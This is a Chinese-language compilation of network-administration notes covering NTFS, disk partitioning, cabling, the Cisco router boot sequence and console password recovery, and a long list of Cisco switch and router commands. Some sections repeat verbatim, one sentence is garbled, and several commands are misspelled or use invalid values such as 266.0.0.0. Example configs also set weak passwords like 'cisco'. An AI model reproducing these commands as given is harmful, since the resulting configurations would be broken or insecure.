  NTFS是“新技术文件系统”的缩写。微软推出NTFS文件系统就是为了弥补FAT文件系统的一些不足,其中最大的改进是容错性和安全性能。

  容错性:NTFS可以自动地修复磁盘错误而不会显示出错信息。Windows 2000向NTFS分区中写文件时,会在系统内存中保留文件的一份拷贝,然后检查向磁盘中所写的文件是否与内存中的一致。如果两者不一致,Windows就把相应的扇区标为坏扇区而不再使用它(簇重映射),然后用内存中保留的文件拷贝重新向磁盘上写文件。如果在读文件时出现错误,NTFS则返回一个读错误信息,并告知相应的应用程序数据已经丢失。

  安全性:NTFS有许多安全性能方面的选项,可以在本机上和通过远程的方法保护文件、目录。NTFS还支持加密文件系统(EFS),可以阻止没有授权的用户访问文件。

  文件压缩:NTFS文件系统的另一个好处是支持文件压缩功能,用户可以选择压缩单个文件或整个文件夹。

  磁盘限额:磁盘限额功能允许系统管理员管理分配给各个用户的磁盘空间,合法用户只能访问属于自己的文件,Windows 2000中的磁盘限额功能是基于用户和卷的。

  怎样正确地为服务器硬盘分区?

  在硬盘分工上要注意“按需而设”,如要在服务器上安装SQL数据库、进销存管理软件和一些财务软件,就最好分3个区,同时在C盘上大小要适当,一般选择10G左右(服务器总硬盘大小为40G),SQL和进销存软件安装在另外一个分区(不要安装在C盘分区,这样会
严重影响系统速度),大小应在20G左右,其他一些软件和财务软件放在其余盘,大小在10G左右。这样划分的原因是让C盘只安装系统软件,但有人认为不需要这么大,其实这不能与我们平时所用的PC机一样来看待,服务器上连着许多工作站,需要许多任务同时运行,系统会调用许多软件,这时会产生许多临时文件,需要大量磁盘空间来存放,况且服务器上每天都会产生一些日志文件(特别是一些诸如系统备份日志文件),每天这样下去也需要大量磁盘空间来保存(作为一个网管人员要定期对这些日志文件和临时文件进行清除),至于D盘一般较大是因为数据库每天会增加大量数据,所以要求磁盘空间应大些,至于E盘就不多说了。

  为什么要为服务器选择ntfs格式?

  NTFS是“新技术文件系统”的缩写。微软推出NTFS文件系统就是为了弥补FAT文件系统的一些不足,其中最大的改进是容错性和安全性能。

  容错性:NTFS可以自动地修复磁盘错误而不会显示出错信息。Windows 2000向NTFS分区中写文件时,会在系统内存中保留文件的一份拷贝,然后检查向磁盘中所写的文件是否与内存中的一致。如果两者不一致,Windows就把相应的扇区标为坏扇区而不再使用它(簇重映射),然后用内存中保留的文件拷贝重新向磁盘上写文件。如果在读文件时出现错误,NTFS则返回一个读错误信息,并告知相应的应用程序数据已经丢失。

  安全性:NTFS有许多安全性能方面的选项,可以在本机上和通过远程的方法保护文件、目录。NTFS还支持加密文件系统(EFS),可以阻止没有授权的用户访问文件。

  文件压缩:NTFS文件系统的另一个好处是支持文件压缩功能,用户可以选择压缩单个文件或整个文件夹。

  磁盘限额:磁盘限额功能允许系统管理员管理分配给各个用户的磁盘空间,合法用户只能访问属于自己的文件,Windows 2000中的磁盘限额功能是基于用户和卷的。

  怎样正确地为服务器硬盘分区?

  在硬盘分工上要注意“按需而设”,如要在服务器上安装SQL数据库、进销存管理软件和一些财务软件,就最好分3个区,同时在C盘上大小要适当,一般选择10G左右(服务器总硬盘大小为40G),SQL和进销存软件安装在另外一个分区(不要安装在C盘分区,这样会
严重影响系统速度),大小应在20G左右,其他一些软件和财务软件放在其余盘,大小在10G左右。这样划分的原因是让C盘只安装系统软件,但有人认为不需要这么大,其实这不能与我们平时所用的PC机一样来看待,服务器上连着许多工作站,需要许多任务同时运行,系统会调用许多软件,这时会产生许多临时文件,需要大量磁盘空间来存放,况且服务器上每天都会产生一些日志文件(特别是一些诸如系统备份日志文件),每天这样下去也需要大量磁盘空间来保存(作为一个网管人员要定期对这些日志文件和临时文件进行清除),至于D盘一般较大是因为数据库每天会增加大量数据,所以要求磁盘空间应大些,至于E盘就不多说了。

  为什么要为服务器选择ntfs格式?

  NTFS是“新技术文件系统”的缩写。微软推出NTFS文件系统就是为了弥补FAT文件系统的一些不足,其中最大的改进是容错性和安全性能。

  容错性:NTFS可以自动地修复磁盘错误而不会显示出错信息。Windows 2000向NTFS分区中写文件时,会在系统内存中保留文件的一份拷贝,然后检查向磁盘中所写的文件是否与内存中的一致。如果两者不一致,Windows就把相应的扇区标为坏扇区而不再使用它(簇重映射),然后用内存中保留的文件拷贝重新向磁盘上写文件。如果在读文件时出现错误,NTFS则返回一个读错误信息,并告知相应的应用程序数据已经丢失。

  安全性:NTFS有许多安全性能方面的选项,可以在本机上和通过远程的方法保护文件、目录。NTFS还支持加密文件系统(EFS),可以阻止没有授权的用户访问文件。

  文件压缩:NTFS文件系统的另一个好处是支持文件压缩功能,用户可以选择压缩单个文件或整个文件夹。

  磁盘限额:磁盘限额功能允许系统管理员管理分配给各个用户的磁盘空间,合法用户只能访问属于自己的文件,Windows 2000中的磁盘限额功能是基于用户和卷的。

怎么样做布线选择?

  布线是任何网络系统的关键部件之一,因此决策人员必须准备将网络总投资的10%用于这一领域。对高质量的布线和网络设计方面的投资是物有所值的。

  电缆的选择

  连接在网络中的设备类型及电缆上所承载的通信负载是选择
电缆的关键因素。在布线系统中应首先确定是使用屏蔽电缆、非屏蔽电缆、光缆,还是将它们结合在一起使用。

  电缆通常由2~1800个线对组成,一般使用带有绝缘层的导线并使用一层或多层塑料外皮。大对数电缆通常用于主干布线系统,它们特别适合在话音和低速率数据应用中使用。

  长度限制

  电缆在干线和水平(集线器到桌面)布线系统应用中的最大长度,应遵循国际标准IS0/IECIS11801中的详细说明。

  尺寸限制

  在确定电缆类型前,对电缆走线的可用空间进行检查也是非常重要的一点。尺寸、重量和屏蔽灵活性等因素主要取决于电缆是否采用金属箔或编制护层,以及电缆中使用了多少导线。

  UTP电缆

  非屏蔽双绞线对(UTP)可以在622Mbps或更高的传输速率上传输数据。相对于屏蔽型电缆,这种电缆价窀汀⑻寤 TP电缆通过将电缆线对进行更紧密的匹配来减小EMI干扰。这种电缆也被称为平衡电路。

  电路的平衡

  电缆的信噪比(SNR)是用来测量电缆中在存在噪声信号的情况下信号质量的指标。在理想的平衡电路中,导体中引入的噪声电压的和是零,这样线对之间的信号传输将没有干扰,然而这种理想情况是无法完全实现的。

  屏蔽电缆中由于存在屏蔽,它的平衡特性较差,因此良好的屏蔽完整性和良好的接地对屏蔽电缆来说是非常重要的。高质量的UTP电缆则可以在不需要接地或整个电路不需要屏蔽的情况下实现良好的平衡电路特性。由于光纤通过光波传输信号,因此它不受任何形式的电磁屏蔽影响。

  光缆的选择

  在传输速率要求超过155Mbps和需要更长传输距离的应用中,光纤通常是最佳选择。光纤具有体积小、耐用等优点,但它的成本要比其他类型的电缆要高。在大多数网络中,一般都采用光缆作为干线,而使用UTP电缆来充当水平连接线。对于那些由于受安装时间、空间或其他限制而不易安装电缆的系统来说,无线局域网可以作为一种可替代的方案。

  怎样做布线规划?

  大多数电缆厂商为它们的产品规定了15年的保质期。在这段时间内,变化是不可避免的,同时也是无法准确预测的。惟一的解决方法是设计网络时为满足网络变化和增长的要求而进行相应的规划。规划包括以下内容:

  未来的投资保护

  在正常使用条件下,新型网络不应该在15年建筑物整修周期内限制系统的升级。经过精心设计的布线系统可以承受超过大多数局域网传输速率10~15倍的数据流量。这将允许在不改变布线系统的情况下使用新型网络技术。

  通用布线系统

  通用布线系统的主要优点是,用户可以利用它将不同厂商的设备接入网络。同时,它也允许用户在同一个布线网络上运行几个独立的系统。比方说,用户可以在一个布线系统上建立电话、计算机和环境控制等系统。

  布线的结构

  通用布线和海量布线是结构化布线的核心内容,朗讯科技(前身为AT&T)和它的SYSTIMAXSCS解决方案是这方面的先驱。它使用一种开放式结构平台,支持所有的主要专用网络和非专用网络的标准和协议。SYSTIMAXSCS使用UTP电缆和光缆作为传输媒介,采用星型拓扑结构,使用标准插座进行端接。SYSTIMAXSCS使用的电缆类型简单,组成的网络模块化,在不影响用户使用的情况下可以很容易地对网络进行扩展或改变。

  网络部件

  位于每个建筑或建筑群内的配线架是用来实现计算机、外设、网络集线器和其他设备快速接入或撤出网络的部件。这对于结构和布局不断进行调整的公司,可以节约大量的成本。

  怎样在布线时避免干扰?

  每种有源电子和电气设备都可能产生电磁干扰来破坏网络通信。随着电子设备使用的增加,这个问题也变得越来越突出。在选择电缆和电缆布线的考虑中,如何防止EMI干扰以保护通信也是一个非常关键的问题。

  有两种方式来测量电缆的串音性能:线对之间的串音和PowerSum串音。线对之间的串音只是用于测量电缆中线对产生的最大干扰的情况的。

  PowerSum

  PowerSum是在多线对电缆的所有线对上都有信号传输时进行测量的方法可以更真实地反映串音干扰的情况。对于电缆中线对数超过4对的电缆,PowerSum是惟一一种可正确测试串音性能的方法。

  信噪比

  在系统中用于测量对EMI干扰的抑制情况的指标是信噪比(SNR)。网络的信噪比越高,网络发生数据传输错误的风险就越小。

  电缆走线

  包括连接器和配线架在内的所有网络部件,要求必须都具有抗EMI干扰的一些设施。当使用不同厂商的产品构建网络时,这一点尤其要加以注意。

  布线设计和安装应注意哪些方面?

  在决定了采用何种网络配置和电缆类型之后,剩下的工作就是进行具体的系统设计和安装。首先应确定网络的结构,通常这是一项比较直接的任务。

  折叠的干线

  网络的典型结构可能会因用户需求而有所不同。例如
可以采用折叠的干线结构,以便于将服务器、集线器和配线架集中放置在一个紧凑的安全的区域内,这样可以节省空间并改善系统的物理安全性。

  冗余

  如果系统是用于执行关键任务的,那么系统可能需要使用多条干线来实现网状网络设计,使系统具有一定程度的冗余。

  物理限制

  在规划的较早阶段已经选择了在干线、水平布线和海量布线中使用的电缆类型。在安装、设计和规划阶段,在选择电缆类型时考虑它的物理限制是十分重要的。

  电缆走线

  电缆厂商将给出电缆最小弯曲半径和最大拉力等指标,他们还将就诸如热源、EMI干扰源等方面的问题给出相关的参考建议。此外,电缆将和其他哪些网络共用管线,特别是在有电力电缆分布的地方,EMI问题应特别加以注意。

  走线图

  在布线系统进行安装以前必须准备一份完整的电缆走线图。它对安装人员有很大的帮助,同时对于今后网络的维护、扩展和故障查找也有很大的参考价值。

  电缆标识

  图表与电缆上实际标签应互相参照。制定计划和标识的工作可由安装人员或室内系统部门来完成。有很多软件包可以帮助人们来完成这方面的工作

   交换各种端口间连接应该如何选择线?
   其实,交换机的UP-LINK口就是厂商在生产交换机的时候就特别设计了一个已经跳好交叉接法的专用端口,而使得这个专用的端口可以用平行线和其它交换机的普通端口相连。除此之外,一般来说交换机上的UP-LINK口的带宽要比普通端口大。
以下列出各种设备连接时所要用的是交叉线?还是平行线~?(如果遇到交叉和平行线都可以联通的情况时,不要意外,现在很多高档一些的交换机都可以自动转换线序)
 
         设备      设备              线型
         计算机—-计算机            交叉线
         计算机—-交换机            平行线
         计算机—-UP-LINK口         交叉线
         交换机—-交换机            交叉线
         交换机—-UP-LINK口         平行线
      UP-LINK口—-UP-LINK口         交叉线`

2006年07月25日

一、路由器开机初始序列

当路由器进行初始化时,路由器进行以下操作:

1)自ROM执行上电自检,检测CPU,内存、接口电路的基本操作。

2)自ROM进行引导,将操作系统装下载到主存。

3)引导操作系统由配置寄存器的引导预确定由FLASH 或网络下载,则配置文件的

boot system 命令确定其确切位置。

4)操作系统下载到低地址内存,下载后由操作系统确定路由器的工作硬件和软件

部分并在屏幕上显示其结果。

5)NVRAM中存储的配置文件装载到主内存并通过执行,配置启动路由进程,提供接

口地址、设置介质特性。如果NVRAM中设有有效的配置文件,则进入Setup 会话模

式。

6)然后进入系统配置会话,显示配置信息,如每个接口的配置信息。

 

二、Setup会话

当NVRAM里没有有效的配置文件时,路由器会自动进入Setup会话模式。以后也可

在命令行敲入Setup进行配置。

Setup 命令是一个交互方式的命令,每一个提问都有一个缺省配置,如果用缺省

配置则敲回车即可。如果系统已经配置过,则显示目前的配置值。如果是第一次

配置,则显示出厂设置。当屏幕显示 "—— More ——",键入空格键继续;

若从Setup 中退出,只要键入Ctrl-C即可。

 

1、Setup主要参数:

配置它的一般参数,包括:

主机名 :hostname

特权口令 :enable password

虚终端口令 :virtual terminal password

SNMP网管 :SNMP Network Management

IP :IP

IGRP路由协议:IGRP Routing

RIP路由协议 :RIP Routing

DECnet : DECnet . 等

 

其中 Console 的secret、 password的设置:

enable secret <string>

enable password <string>

Virtual Terminor 的password的设置:

Line vty <number>

Password <string>

Host name的设置:

Hostname <string>

 

2、Setup接口参数:

设置接口参数,如以太网口、TokenRing口、同步口、异步口等。包括IP地址、子

网屏蔽、TokengRing速率等。

 

3、Setup描述:

在设置完以上参数后,该命令提示是否要用以上的配置,如果回答是"YES"则系统

会存储以上的配置参数,系统就可以使用了。

 

4、 Setup相关命令:

Show config

write memory

write erase

reload

setup

 

5、路由器丢失PASSWORD的恢复

以下办法可以恢复:

enable secret password (适合10。3(2)或更新的版本)

enable password

console password

通过修改Configuration Register(出厂为0×2102),使路由器忽略PASSWORD,这

样就可以进入路由器,就可以看到enable password和Console password,但ena

ble secret password以被加密,只能替换。可以进入的configuration Registe

r值为0×142.

 

· 运行password恢复可能会使系统DOWN掉一个半小时;

· 将Console terinal连在路由器的Console口上,确认终端设置为9600bps、8

Data bit 、No parity、1 stop bit;

· show version显示Configuration Register 0×2102;

· 关机再开,按"Ctrl+ Break",进入ROM MONITOR状态,提示符为">";

· 键入"> o/r 0×142",修改 Configuration Register到0×142,可以忽略原先的

password;

· 键入"> initialize",初始化路由器,等一段时间后,路由器会出现以下提示

"system configuration Diaglog ……"

Enter "NO"

提示"Press RETURN to get started!" ,Press "Enter"

· 进入特权模式

Router>enable

Router#show startup-config

这样就可以得到password(enable&console password)

· 修改password

"Router#config ter"

"Router(config)# enable secret cisco"

"Router(config)# enable password cisco1"

"Router(config)# line con 0"

"Router(config)# password cisco"

"Router(config)# config-register 0×2102"

"ctrl + Z"

"Router#copy running-config startup-config"

"reload"

· 以password cisco进入特权用户。

 

三、路由器配置

1)路由器模式

在Cisco 路由器中,命令解释器称为EXEC,EXEC解释用户键入的命令并执行相应

的操作,在输入EXEC命令前必须先登录到路由器上。基于安全原因,EXEC设置了

两个访问权限:用户级和特权级,用户级可执执行的命令是特权级命令的子集。

在特权级,可以使用:configuration,interface,subinterface,line,rout

er,router-map等命令。

 

2)配置模式

使用Config命令可进入配置模式,进入该模式后,EXEC提示用户可用的配置方式

如终端、NVRAM、网络三种,缺省是终端方式。

 

3)IP路由协议模式

在配置模式下输入Router命令,可进入IP路由协议模式,可选的路由协议一般有

:bgp、egp、igrp、eigrp、rip等动态路由和静态路由。

 

4)接口配置模式

在每一个端口上可以设置很多特性,接口配置命令修改以太网、令牌环网、FDDI

或同步、异步口等操作。

 

5)口令配置

可以采用口令来限制对路由器的访问,口令可以设定到具体的线路上或是特权E

XEC模式。

Line console 0 命令设置控制台终端口令

Line vty 0 命令设置Telnet虚终端口令

Enable-password 命令设置特权EXEC访问权限

 

6)路由器命名

在配置模式下用hostname,如:

hostname RouterA

 

四、用户帮助提示

1、在用户提示符下键入?可以列出常用命令,通常有以下命令:

connect 打开一个中端连接

disconnect 关闭一个已有的telnet会话

enable 进入特权级

exit 退出EXEC

help 交互求助系统描述

lock 终端锁定

login 以特定用户登录

logout 退出EXEC

ping 发送echo信息

resume 恢复一个激活的telnet连接

show 显示正在运行的系统信息

systat 显示正在运行的系统信息

telnet 打开一个telnet连接

terminal 设置终端线路参数

where 列出激活的telnet连接

 

2、上下相关帮助

上下相关帮助包括:

符号转换 :键入命令有错时提示;

关键字完成 :键入命令字的一部分即可;

命令记忆 :可用" "调出以前的命令;

命令提示 :当命令记不完全时,可用"?"替代.

 1.在基于IOS的交换机上设置主机名/系统名:
  switch(config)# hostname hostname
  在基于CLI的交换机上设置主机名/系统名:
  switch(enable) set system name name-string
  2.在基于IOS的交换机上设置登录口令:
  switch(config)# enable password level 1 password
  
  在基于CLI的交换机上设置登录口令:
  switch(enable) set password
  switch(enable) set enalbepass

  3.在基于IOS的交换机上设置远程访问:
  switch(config)# interface vlan 1
  switch(config-if)# ip address ip-address netmask
  switch(config-if)# ip default-gateway ip-address
  在基于CLI的交换机上设置远程访问:
  switch(enable) set interface sc0 ip-address netmask broadcast-address
  switch(enable) set interface sc0 vlan
  switch(enable) set ip route default gateway

  4.在基于IOS的交换机上启用和浏览CDP信息:
  switch(config-if)# cdp enable
  switch(config-if)# no cdp enable
  为了查看Cisco邻接设备的CDP通告信息:
  switch# show cdp interface [type modle/port]
  switch# show cdp neighbors [type module/port] [detail]
  在基于CLI的交换机上启用和浏览CDP信息:
  switch(enable) set cdp {enable|disable} module/port
  为了查看Cisco邻接设备的CDP通告信息:
  switch(enable) show cdp neighbors[module/port] [vlan|duplex|capabilities|detail]

  5.基于IOS的交换机的端口描述:
  switch(config-if)# description description-string
  基于CLI的交换机的端口描述:
  switch(enable)set port name module/number description-string

  6.在基于IOS的交换机上设置端口速度:
  switch(config-if)# speed{10|100|auto}
  在基于CLI的交换机上设置端口速度:
  switch(enable) set port speed moudle/number {10|100|auto}
  switch(enable) set port speed moudle/number {4|16|auto}

  7.在基于IOS的交换机上设置以太网的链路模式:
  switch(config-if)# duplex {auto|full|half}
  在基于CLI的交换机上设置以太网的链路模式:
  switch(enable) set port duplex module/number {full|half}

  8.在基于IOS的交换机上配置静态VLAN:
  switch# vlan database
  switch(vlan)# vlan vlan-num name vla

  switch(vlan)# exit
  switch# configure teriminal
  switch(config)# interface interface module/number
  switch(config-if)# switchport mode access
  switch(config-if)# switchport access vlan vlan-num
  switch(config-if)# end
  在基于CLI的交换机上配置静态VLAN:
  switch(enable) set vlan vlan-num [name name]
  switch(enable) set vlan vlan-num mod-num/port-list

  9. 在基于IOS的交换机上配置VLAN中继线:
  switch(config)# interface interface mod/port
  switch(config-if)# switchport mode trunk
  switch(config-if)# switchport trunk encapsulation {isl|dotlq}
  switch(config-if)# switchport trunk allowed vlan remove vlan-list
  switch(config-if)# switchport trunk allowed vlan add vlan-list
  在基于CLI的交换机上配置VLAN中继线:
  switch(enable) set trunk module/port [on|off|desirable|auto|nonegotiate]
  Vlan-range [isl|dotlq|dotl0|lane|negotiate]

  10.在基于IOS的交换机上配置VTP管理域:
  switch# vlan database
  switch(vlan)# vtp domain domain-name
  在基于CLI的交换机上配置VTP管理域:
  switch(enable) set vtp [domain domain-name]

  11.在基于IOS的交换机上配置VTP 模式:
  switch# vlan database
  switch(vlan)# vtp domain domain-name
  switch(vlan)# vtp {sever|cilent|transparent}
  switch(vlan)# vtp password password
  在基于CLI的交换机上配置VTP 模式:
  switch(enable) set vtp [domain domain-name] [mode{ sever|cilent|transparent }][password password]
  12. 在基于IOS的交换机上配置VTP版本:
  switch# vlan database
  switch(vlan)# vtp v2-mode
  在基于CLI的交换机上配置VTP版本:
  switch(enable) set vtp v2 enable

  13. 在基于IOS的交换机上启动VTP剪裁:
  switch# vlan database
  switch(vlan)# vtp pruning
  在基于CL I 的交换机上启动VTP剪裁:
  switch(enable) set vtp pruning enable

  14.在基于IOS的交换机上配置以太信道:
  switch(config-if)# port group group-number [distribution {source|destination}]
  在基于CLI的交换机上配置以太信道:
  switch(enable) set port channel moudle/port-range mode{on|off|desirable|auto}

  15.在基于IOS的交换机上调整根路径成本:
  switch(config-if)# spanning-tree [vlan vlan-list] cost cost
  在基于CLI的交换机上调整根路径成本:

  switch(enable) set spantree portcost moudle/port cost
  switch(enable) set spantree portvlancost moudle/port [cost cost][vlan-list]

  16.在基于IOS的交换机上调整端口ID:
  switch(config-if)# spanning-tree[vlan vlan-list]port-priority port-priority
  在基于CLI的交换机上调整端口ID:
  switch(enable) set spantree portpri {mldule/port}priority
  
  switch(enable) set spantree portvlanpri {module/port}priority [vlans]

  17. 在基于IOS的交换机上修改STP时钟:
  switch(config)# spanning-tree [vlan vlan-list] hello-time seconds
  switch(config)# spanning-tree [vlan vlan-list] forward-time seconds
  ` switch(config)# spanning-tree [vlan vlan-list] max-age seconds
  在基于CLI的交换机上修改STP时钟:
  switch(enable) set spantree hello interval[vlan]
  switch(enable) set spantree fwddelay delay [vlan]
  switch(enable) set spantree maxage agingtiame[vlan]

  18. 在基于IOS的交换机端口上启用或禁用Port Fast 特征:
  switch(config-if)#spanning-tree portfast
  在基于CLI的交换机端口上启用或禁用Port Fast 特征:
  switch(enable) set spantree portfast {module/port}{enable|disable}

  19. 在基于IOS的交换机端口上启用或禁用UplinkFast 特征:
  switch(config)# spanning-tree uplinkfast [max-update-rate pkts-per-second]
  在基于CLI的交换机端口上启用或禁用UplinkFast 特征:
  switch(enable) set spantree uplinkfast {enable|disable}[rate update-rate] [all-protocols off|on]

 

20. 为了将交换机配置成一个集群的命令交换机,首先要给管理接口分配一个IP地址,然后使用下列命令: switch(config)# cluster enable cluster-name

  21. 为了从一条中继链路上删除VLAN,可使用下列命令:
  switch(enable) clear trunk module/port vlan-range

  22. 用show vtp domain 显示管理域的VTP参数.

  23. 用show vtp statistics显示管理域的VTP参数.

  24. 在Catalyst交换机上定义TrBRF的命令如下:
  switch(enable) set vlan vlan-name [name name] type trbrf bridge bridge-num[stp {ieee|ibm}]

  25. 在Catalyst交换机上定义TrCRF的命令如下:
  switch (enable) set vlan vlan-num [name name] type trcrf
  {ring hex-ring-num|decring decimal-ring-num} parent vlan-num

  26. 在创建好TrBRF VLAN之后,就可以给它分配交换机端口.对于以太网交换,可以采用如下命令给VLAN分配端口:
  switch(enable) set vlan vlan-num mod-num/port-num

  27. 命令show spantree显示一个交换机端口的STP状态.

  28. 配置一个ELAN的LES和BUS,可以使用下列命令:
  ATM (config)# interface atm number.subint multioint
  ATM(config-subif)# lane serber-bus ethernet elan-name

  29. 配置LECS:
  ATM(config)# lane database database-name
  ATM(lane-config-databade)# name elan1-name server-atm-address les1-nsap-address
  ATM(lane-config-databade)# name elan2-name server-atm-address les2-nsap-address
  
  ATM(lane-config-databade)# name …

  30. 创建完数据库后,必须在主接口上启动LECS.命令如下:
  ATM(config)# interface atm number
  ATM(config-if)# lane config database database-name
  ATM(config-if)# lane config auto-config-atm-address
  31. 将每个LEC配置到一个不同的ATM子接口上.命令如下:
  ATM(config)# interface atm number.subint multipoint
  ATM(config)# lane client ethernet vlan-num elan-num

  32. 用show lane server 显示LES的状态.

  33. 用show lane bus显示bus的状态.

  34. 用show lane database显示LECS数据库可内容.

  35. 用show lane client显示LEC的状态.

  36. 用show module显示已安装的模块列表.

  37. 用物理接口建立与VLAN的连接:
  router# configure terminal
  router(config)# interface media module/port
  router(config-if)# description description-string
  router(config-if)# ip address ip-addr subnet-mask
  router(config-if)# no shutdown

  38. 用中继链路来建立与VLAN的连接:
  router(config)# interface module/port.subinterface
  router(config-ig)# encapsulation[isl|dotlq] vlan-number
  router(config-if)# ip address ip-address subnet-mask

  39. 用LANE 来建立与VLAN的连接:
  router(config)# interface atm module/port
  router(config-if)# no ip address
  router(config-if)# atm pvc 1 0 5 qsaal
  router(config-if)# atm pvc 2 0 16 ilni
  router(config-if)# interface atm module/port.subinterface multipoint
  router(config-if)# ip address ip-address subnet-mask
  router(config-if)# lane client ethernet elan-num
  router(config-if)# interface atm module/port.subinterface multipoint
  router(config-if)# ip address ip-address subnet-name
  router(config-if)# lane client ethernet elan-name
  router(config-if)# …

  40. 为了在路由处理器上进行动态路由配置,可以用下列IOS命令来进行:
  router(config)# ip routing
  router(config)# router ip-routing-protocol
  router(config-router)# network ip-network-number
  router(config-router)# network ip-network-number

 

41. 配置默认路由:
  switch(enable) set ip route default gateway

  42. 为一个路由处理器分配VLANID,可在接口模式下使用下列命令:
  router(config)# interface interface number
  router(config-if)# mls rp vlan-id vlan-id-num

  43. 在路由处理器启用MLSP:
  router(config)# mls rp ip

  44. 为了把一个外置的路由处理器接口和交换机安置在同一个VTP域中:
  router(config)# interface interface number
  router(config-if)# mls rp vtp-domain domain-name

  45. 查看指定的VTP域的信息:
  router# show mls rp vtp-domain vtp domain name

  46. 要确定RSM或路由器上的管理接口,可以在接口模式下输入下列命令:
  router(config-if)#mls rp management-interface

  47. 要检验MLS-RP的配置情况:
  router# show mls rp
  48. 检验特定接口上的MLS配置:
  router# show mls rp interface interface number

  49. 为了在MLS-SE上设置流掩码而又不想在任一个路由处理器接口上设置访问列表:
  
  set mls flow [destination|destination-source|full]

  50. 为使MLS和输入访问列表可以兼容,可以在全局模式下使用下列命令:
  router(config)# mls rp ip input-acl

  51. 当某个交换机的第3层交换失效时,可在交换机的特权模式下输入下列命令:
  switch(enable) set mls enable

  52. 若想改变老化时间的值,可在特权模式下输入以下命令:
  switch(enable) set mls agingtime agingtime

  53. 设置快速老化:
  switch(enable) set mls agingtime fast fastagingtime pkt_threshold

  54. 确定那些MLS-RP和MLS-SE参与了MLS,可先显示交换机引用列表中的内容再确定:
  switch(enable) show mls include

  55. 显示MLS高速缓存记录:
  switch(enable) show mls entry

  56. 用命令show in arp显示ARP高速缓存区的内容。

  57. 要把路由器配置为HSRP备份组的成员,可以在接口配置模式下使用下面的命令:
  router(config-if)# standby group-number ip ip-address

  58. 为了使一个路由器重新恢复转发路由器的角色,在接口配置模式下:
  router(config-if)# standy group-number preempt

  59. 访问时间和保持时间参数是可配置的:
  router(config-if)# standy group-number timers hellotime holdtime

  60. 配置HSRP跟踪:
  router(config-if)# standy group-number track type-number interface-priority

61. 要显示HSRP路由器的状态:
  router# show standby type-number group brief

  62. 用命令show ip igmp确定当选的查询器。

  63. 启动IP组播路由选择:
  router(config)# ip muticast-routing

  64. 启动接口上的PIM:
  dalllasr1>(config-if)# ip pim {dense-mode|sparse-mode|sparse-dense-mode}

  65. 启动稀疏-稠密模式下的PIM:
  router# ip multicast-routing
  router# interface type number
  router# ip pim sparse-dense-mode

  66. 核实PIM的配置:
  dallasr1># show ip pim interface[type number] [count]

  67. 显示PIM邻居:
  dallasr1># show ip neighbor type number

  68. 为了配置RP的地址,命令如下:
  dallasr1># ip pim rp-address ip-address [group-access-list-number][override]

  69. 选择一个默认的RP:
  dallasr1># ip pim rp-address
  通告RP和它所服务的组范围:
  dallasr1># ip pim send-rp-announce type number scope ttl group-list access-list-number
  为管理范围组通告RP的地址:
  dallasr1># ip pim send-rp-announce ethernet0 scope 16 group-list1
  dallasr1># access-list 1 permit 266.0.0.0 0.255.255.255
  设定一个RP映像代理:
  dallasr1># ip pim send-rp-discovery scope ttl
  核实组到RP的映像:
  dallasr1># show ip pim rp mapping
  dallasr1># show ip pim rp [group-name|group-address] [mapping]

  70. 在路由器接口上用命令ip multicast ttl-threshold ttl-value设定TTL阀值:
  dallasr1>(config-if)# ip multicast ttl-threshold ttl-value

  71. 用show ip pim neighbor显示PIM邻居表。

  72. 显示组播通信路由表中的各条记录:
  dallasr1>show ip mroute [group-name|group-address][scoure][summary][count][active kbps]

  73. 要记录一个路由器接受和发送的全部IP组播包:
  dallasr1> #debug ip mpacket [detail] [access-list][group]

  74. 要在CISCO路由器上配置CGMP:
  dallasr1>(config-if)# ip cgmp

  75.配置一个组播路由器,使之加入某一个特定的组播组:
  dallasr1>(config-if)# ip igmp join-group group-address

  76. 关闭 CGMP:
  
  dallasr1>(config-if)# no ip cgmp

  77. 启动交换机上的CGMP:
  dallasr1>(enable) set cgmp enable

  78. 核实Catalyst交换机上CGMP的配置情况:
  catalystla1>(enable) show config
  set prompt catalystla1>
  set interface sc0 192.168.1.1 255.255.255.0
  set cgmp enable

  79. CGMP离开的设置:
  Dallas_SW(enable) set cgmp leave

80. 在Cisco设备上修改控制端口密码:
  R1(config)# line console 0
  R1(config-line)# login
  R1(config-line)# password Lisbon
  R1(config)# enable password Lilbao
  R1(config)# login local
  R1(config)# username student password cisco

  81. 在Cisco设备上设置控制台及vty端口的会话超时:
  R1(config)# line console 0
  R1(config-line)# exec-timeout 5 10
  R1(config)# line vty 0 4
  R1(config-line)# exec-timeout 5 2

  82. 在Cisco设备上设定特权级:
  R1(config)# privilege configure level 3 username
  R1(config)# privilege configure level 3 copy run start
  R1(config)# privilege configure level 3 ping
  R1(config)# privilege configure level 3 show run
  R1(config)# enable secret level 3 cisco

  83. 使用命令privilege 可定义在该特权级下使用的命令:
  router(config)# privilege mode level level command

  84. 设定用户特权级:
  router(config)# enable secret level 3 dallas
  router(config)# enable secret san-fran
  router(config)# username student password cisco

  85. 标志设置与显示:
  R1(config)# banner motd ‘unauthorized access will be prosecuted!’

  86. 设置vty访问:
  R1(config)# access-list 1 permit 192.168.2.5
  R1(config)# line vty 0 4
  R1(config)# access-class 1 in

  87. 配置HTTP访问:
  Router3(config)# access-list 1 permit 192.168.10.7
  Router3(config)# ip http sever
  Router3(config)# ip http access-class 1
  Router3(config)# ip http authentication local
  Router3(config)# username student password cisco

  88. 要启用HTTP访问,请键入以下命令:
  switch(config)# ip http sever

  89. 在基于set命令的交换机上用setCL1启动和核实端口安全:
  switch(enable) set port security mod_num/port_num…enable mac address
  switch(enable) show port mod_num/port_num
  在基于CiscoIOS命令的交换机上启动和核实端口安全:
  switch(config-if)# port secure [mac-mac-count maximum-MAC-count]
  switch# show mac-address-table security [type module/port]

  90. 用命令access-list在标准通信量过滤表中创建一条记录:
  Router(config)# access-list access-list-number {permit|deny} source-address

  91. 用命令access-list在扩展通信量过滤表中创建一条记录:
  Router(config)# access-list access-list-number {permit|deny{protocol|protocol-keyword}}{source source-wildcard|any}{destination destination-wildcard|any}[protocol-specific options][log]

  92. 对于带内路由更新,配置路由更新的最基本的命令格式是:
  R1(config-router)#distribute-list access-list-number|name in [type number]

  93. 对于带外路由更新,配置路由更新的最基本的命令格式是:
  R1(config-router)#distribute-list access-list-number|name out [interface-name] routing-process| autonomous-system-number

  94. set snmp命令选项:
  set snmp community {read-only|ready-write|read-write-all}[community_string]

  95. set snmp trap 命令格式如下:
  set snmp trap {enable|disable}
  [all|moudle|classis|bridge|repeater| auth|vtp|ippermit|vmps|config|entity|stpx]
  set snmp trap rvcr_addr rcvr_community

  96. 启用SNMP chassis 陷阱:
  Console>(enable) set snmp trap enable chassis

